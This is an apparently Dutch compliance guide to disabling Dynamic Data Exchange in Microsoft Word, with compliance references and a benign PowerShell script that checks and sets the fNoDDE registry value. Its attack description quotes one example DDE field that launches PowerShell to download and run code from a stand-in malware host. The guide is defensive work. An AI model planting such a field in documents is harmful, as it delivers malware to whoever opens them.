πΌ Management Samenvatting
Dynamic Data Exchange (DDE) moet volledig worden uitgeschakeld in Word omdat het een legacy protocol is dat actief wordt misbruikt voor code execution attacks zonder macros.
Aanbeveling
IMPLEMENT
Risico zonder
Critical
Risk Score
9/10
Implementatie
2u (tech: 1u)
Van toepassing op:
β Word
DDE in WORD ATTACKS: Identiek aan Excel DDE attacks maar in Word documents. Word fields kunnen DDE commands embedded hebben: {DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell IEX(wget malware.com)"}. User opens .docx β Prompt 'Update automatische links?' β gebruiker klikt Yes β PowerShell executes β Malware. MASSALE EXPLOITATION 2017-2018: APT28 (Fancy Bear) gebruikt Word DDE attacks, Financial sector targeted via DDE, Bypasses Macro beveiliging (DDE β VBA macros). MICROSOFT RESPONSE: Patches + Standaard prompts disabled, maar DDE niet fully removed (legacy compat), moet Schakel uit via policy. DISA STIG: MANDATORY disable.
PowerShell Modules Vereist
Primary API: Intune / Group Policy
Connection:
Required Modules:
Connection:
RegistryRequired Modules:
Implementatie
Schakel uit DDE in Word: Multiple registry keys control DDE behavior. EFFECT: DDE fields NOT executed, No command execution via DDE, Legacy DDE-based workflows broken (rare).
Vereisten
- Word (M365 Apps)
- Verify: Geen DDE dependencies
Implementatie
Gebruik PowerShell-script dynamic-data-exchange-disabled.ps1 (functie Invoke-Remediation) β Schakel uit DDE volledig.
Monitoring
Gebruik PowerShell-script dynamic-data-exchange-disabled.ps1 (functie Invoke-Monitoring) β Verifieer DDE disabled.
Compliance en Auditing
- DISA STIG
- BIO 12.02
- ISO 27001 A.8.7
Remediatie
Gebruik PowerShell-script dynamic-data-exchange-disabled.ps1 (functie Invoke-Remediation) β Herstellen.
Compliance & Frameworks
- BIO: 12.02.01 - Bescherming tegen malware - DDE prevention
- ISO 27001:2022: A.8.7 - Bescherming tegen malware
Automation
Gebruik het onderstaande PowerShell script om deze security control te monitoren en te implementeren. Het script bevat functies voor zowel monitoring (-Monitoring) als remediation (-Remediation).
PowerShell
<#
.SYNOPSIS
Schakelt Dynamic Data Exchange uit in Word
.DESCRIPTION
Dit script implementeert CIS control O365-WD-000003 voor het uitschakelen van Dynamic Data
Exchange (DDE) in Microsoft Word. DDE is een legacy technologie die kan worden misbruikt
voor aanvallen, daarom moet deze uitgeschakeld worden.
.REQUIREMENTS
- PowerShell 5.1 of hoger
- Lokale administrator rechten voor registry wijzigingen
- Microsoft Word geΓ―nstalleerd
.PARAMETER Monitoring
Controleert de huidige compliance status
.PARAMETER Remediation
Past de aanbevolen configuratie toe
.PARAMETER Revert
Herstelt de originele configuratie
.PARAMETER WhatIf
Toont wat er zou gebeuren zonder wijzigingen door te voeren
.EXAMPLE
.\dynamic-data-exchange-disabled.ps1 -Monitoring
Controleert of DDE is uitgeschakeld
.EXAMPLE
.\dynamic-data-exchange-disabled.ps1 -Remediation
Schakelt DDE uit
.NOTES
Registry pad: HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Options\vpref
Waarde: fNoDDE = 1
CIS Control: O365-WD-000003
DISA STIG: Microsoft Office 365 ProPlus v3r3
#>
#Requires -Version 5.1
param(
[switch]$Monitoring,
[switch]$Remediation,
[switch]$Revert,
[switch]$WhatIf
)
# Globale variabelen
$RegistryPath = "HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Options\vpref"
$ValueName = "fNoDDE"
$ExpectedValue = 1
$ControlID = "O365-WD-000003"
function Test-Compliance {
try {
if (-not (Test-Path $RegistryPath)) {
return $false
}
$currentValue = Get-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue
return ($currentValue -and $currentValue.$ValueName -eq $ExpectedValue)
}
catch {
return $false
}
}
function Invoke-Monitoring {
Write-Host "Monitoring ${ControlID}: Dynamic Data Exchange uitschakelen" -ForegroundColor Green
try {
if (-not (Test-Path $RegistryPath)) {
Write-Host "β Registry pad bestaat niet: $RegistryPath" -ForegroundColor Red
return $false
}
$currentValue = Get-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue
if ($currentValue -and $currentValue.$ValueName -eq $ExpectedValue) {
Write-Host "β Control compliant: ${ValueName} = $ExpectedValue (DDE uitgeschakeld)" -ForegroundColor Green
return $true
}
else {
$actualValue = if ($currentValue) { $currentValue.$ValueName } else { "Not Set" }
Write-Host "β Control non-compliant: ${ValueName} = $actualValue (Expected: $ExpectedValue)" -ForegroundColor Red
return $false
}
}
catch {
Write-Host "β Fout bij controleren registry instelling: $($_.Exception.Message)" -ForegroundColor Red
return $false
}
}
function Invoke-Remediation {
Write-Host "Remediating ${ControlID}: Dynamic Data Exchange uitschakelen" -ForegroundColor Yellow
try {
if ($WhatIf) {
Write-Host "WhatIf: Zou registry waarde instellen: ${ValueName} = $ExpectedValue" -ForegroundColor Cyan
return $true
}
if (-not (Test-Path $RegistryPath)) {
Write-Host "Registry pad aanmaken: $RegistryPath" -ForegroundColor Yellow
New-Item -Path $RegistryPath -Force | Out-Null
}
Set-ItemProperty -Path $RegistryPath -Name $ValueName -Value $ExpectedValue -Type DWord -Force
Write-Host "β Registry waarde succesvol ingesteld: ${ValueName} = $ExpectedValue" -ForegroundColor Green
Start-Sleep -Seconds 1
return Invoke-Monitoring
}
catch {
Write-Host "β Fout bij configureren registry instelling: $($_.Exception.Message)" -ForegroundColor Red
return $false
}
}
function Invoke-Revert {
Write-Host "Reverting ${ControlID}: DDE instelling herstellen" -ForegroundColor Yellow
try {
if ($WhatIf) {
Write-Host "WhatIf: Zou registry waarde verwijderen: ${ValueName}" -ForegroundColor Cyan
return $true
}
if (Test-Path $RegistryPath) {
Remove-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue
Write-Host "β Registry waarde verwijderd: ${ValueName}" -ForegroundColor Green
}
return $true
}
catch {
Write-Host "β Fout bij herstellen registry instelling: $($_.Exception.Message)" -ForegroundColor Red
return $false
}
}
# Hoofd uitvoering
try {
if ($Monitoring) {
$result = Invoke-Monitoring
exit $(if ($result) { 0 } else { 1 })
}
elseif ($Remediation) {
$result = Invoke-Remediation
exit $(if ($result) { 0 } else { 1 })
}
elseif ($Revert) {
$result = Invoke-Revert
exit $(if ($result) { 0 } else { 1 })
}
else {
Write-Host "Gebruik: .\dynamic-data-exchange-disabled.ps1 [-Monitoring] [-Remediation] [-Revert] [-WhatIf]" -ForegroundColor Yellow
Write-Host " -Monitoring: Controleer huidige compliance status" -ForegroundColor White
Write-Host " -Remediation: Pas aanbevolen configuratie toe" -ForegroundColor White
Write-Host " -Revert: Herstel originele configuratie" -ForegroundColor White
Write-Host " -WhatIf: Toon wat er zou gebeuren" -ForegroundColor White
Write-Host ""
Write-Host "Handmatige configuratie:" -ForegroundColor Cyan
Write-Host "Group Policy: User Configuration > Administrative Templates > Microsoft Word 2016" -ForegroundColor White
Write-Host "> Word Options > Advanced > General" -ForegroundColor White
Write-Host "> Dynamic Data Exchange: Disabled" -ForegroundColor White
}
}
catch {
Write-Host "β Onverwachte fout: $($_.Exception.Message)" -ForegroundColor Red
exit 1
}
Risico zonder implementatie
Risico zonder implementatie
Critical: KRITIEK: Word DDE is code execution Zonder macros. APT28, ransomware gangs gebruiken dit. Bypasses Macro beveiliging. MANDATORY disable.
Management Samenvatting
Schakel uit DDE in Word. Code execution prevention. DISA STIG vereist. Voldoet aan BIO 12.02. Implementatie: 1-2 uur. KRITIEKE EXPLOIT PREVENTION.
- Implementatietijd: 2 uur
- FTE required: 0.02 FTE